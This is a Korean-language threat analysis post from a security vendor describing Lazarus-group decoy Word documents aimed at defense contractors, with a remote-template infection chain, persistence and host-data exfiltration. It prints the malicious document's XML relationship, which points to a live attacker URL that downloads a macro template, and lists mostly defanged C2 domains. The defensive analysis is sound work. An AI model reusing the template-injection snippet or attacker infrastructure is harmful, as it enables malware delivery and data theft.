포스팅 내용

악성코드 분석 리포트

라자루스(Lazarus)그룹의 지속적인 해외 방위산업체 타깃 공격 포착


안녕하세요? 

이스트시큐리티 시큐리티대응센터(ESRC)입니다.


특정 정부 후원을 받는 것으로 추정되는 APT공격 조직인 라자루스(Lazarus)의 공격이 지속되고 있으며, 국내외 APT 공격 뿐만 아니라 최근에는 지속적으로 해외 방위 산업체를 타깃으로 공격을 지속 중입니다.





지난 5월초에도 해외 방위 산업체를 타깃으로 하는 APT공격이 포착된 바 있고, 금일(5/15)도 역시 새로운 APT 공격용 악성문서 파일이 확인되었습니다.


금일 새롭게 발견된 파일은 ‘LM_IFG_536R.docx’, ‘BAE_JD_2020.docx’ ‘Boeing_AERO_GS.docx’ 들로 이 3개의 신규 악성 문서 파일들은 지난 5월초에 발견된 'Senior_Design_Engineer.docx', 'Boeing_DSS_SE.docx', 'Boeing_PMS.docx' 악성문서들과 동작 방식이 동일합니다



  파일명

 원격 템플릿 매크로 도메인

  문서 테마

  LM_IFG_536R.docx

 sanlorenzoyacht[.]com

  미국 록히드마틴

  BAE_JD_2020.docx

 anca-aste[.]it

  영국 배시스템즈

  Boeing_AERO_GS.docx

 anca-aste[.]it

  미국 보잉

  Senior_Design_Engineer.docx

 astedams[.]it

  영국 배시스템즈

  Boeing_DSS_SE.docx

 astedams[.]it  미국 보잉

  Boeing_PMS.docx

 sanlorenzoyacht[.]com  미국 보잉



3개의 문서가 동작방식이 동일하기 때문에 'LM_IFG_536R.docx'에 대한 문서를 예시로 간략한 분석 내용을 공유합니다.


‘LM_IFG_536R.docx’ 문서를 실행하면, 아래 설정을 통하여 공격자 설정한 URL로부터 원격 템플릿 매크로 파일을 추가 다운로드 및 실행합니다. 



[그림1 ] LM_IFG_536R.docx 워드 파일 C2 연결 화면



[그림 2] LM_IFG_536R.docx 워드 파일 화면 



[그림 3] BAE_JD_2020.docx 워드 파일 C2 연결 화면



[그림 4] BAE_JD_2020.docx 워드 파일 화면



[그림 5] Boeing_AERO_GS.docx 워드 파일 C2 연결 화면



[그림 6] Boeing_AERO_GS.docx 워드 파일 화면



지난 번 발견된 3개의 파일인 ‘Senior_Design_Engineer.docx’ ‘Boeing_DSS_SE.docx’, ‘Boeing_PMS.docx’ 문서들 역시 파일명은 다르지만, 동작 방식은 동일합니다.


‘Senior_Design_Engineer.docx’ 문서가 실행되면, 아래 설정을 통하여 공격자 설정한 URL로부터 원격 템플릿 파일을 추가 다운로드 및 실행합니다.



<?xml version="1.0" encoding="UTF-8" standalone="yes"?>


<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">


<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://www.astedams.it/uploads/frame/61.dotm" TargetMode="External"/>


</Relationships>



실행되는 파일 내부에는 매크로 코드가 존재합니다. 이 코드는 스트림 ‘ADODB.Stream’로부터 파일을 Base64 디코딩하여 ‘\AppData\Local\Microsoft\Notice\wsdts.db’ 파일을 드롭 및 로드합니다.


생성되는 ‘wsdts.db’ 파일은 dll 파일로써 vbs코드를 통해 복호화 키와 함께 export 함수 ‘sqlite3_stmt_all’를 호출합니다.



[그림 7] ‘wsdts.db’파일 드롭 및 실행 코드



‘sqlite3_stmt_all’ 기능은 ‘onedrive’ 파일로 위장하여 자가 복제를 수행하고 다운로드된 파일 ’61.dotm’를 삭제합니다.


추가로 부팅 시 자동 실행되도록 시작 프로그램 경로에 ‘OneDrive.lnk’ 파일로 등록하며 은폐된 코드를 로드하는 ‘sqlite3_steps’ 함수를 ‘rundll32.exe’를 통해 실행합니다.



[그림 8] ‘sqlite3_steps’실행 코드



‘sqlite3_steps’ 함수를 통해 디코딩된 PE는 감염 PC의 컴퓨터 이름, 사용자 이름, 저장 장치 정보, 프로세스 리스트를 Base64로 인코딩하여 ‘https://www.astedams[.]it/newsl/offerte-news.asp’로 전송한 뒤, 추가 파일 다운로드를 시도합니다.


분석 시점에서 추가파일은 발견되지 않았습니다.


 

[그림 9] 감염 PC 정보 수집 코드



이번에 발견된 또다른 2개의 신종 악성문서도 분석한 문서와 동작방식은 모두 동일합니다.


라자루스(Lazarus) 그룹은 한국과 미국 등을 대상으로 활동하는 대표적인 국가 차원 위협 요소 중 하나로, 사이버 침투 작전과 함께 온라인 은행, 비트코인 거래소 해킹 등을 통한 외화벌이를 조직적으로 수행하고 있으며 지난 2019년에도 특정 그룹을 대상으로 지속적으로 공격을 시도하는 정황이 포착되기도 했습니다.


최근 악성 문서 파일을 미끼로 해외 방위산업체 타깃 공격을 수행하고 있고, 최근 1달내에 굉장히 활발한 활동을 보이고 있는 상황입니다. 언제든지 국내 방위산업체 임직원을 타깃으로 공격을 수행할 가능성이 있으므로 각별한 주의가 요구됩니다.


현재 알약에서는 해당 악성코드를  ’Trojan.Downloader.DOC.Gen', 'Trojan.Dropper.W97M.Agent’ 등으로 탐지 및 차단하고 있습니다.


상세한 침해지표(IoC) 자료는 쓰렛인사이드(Threat Inside) 서비스를 통해 제공해 드리겠습니다.



티스토리 방명록 작성
name password homepage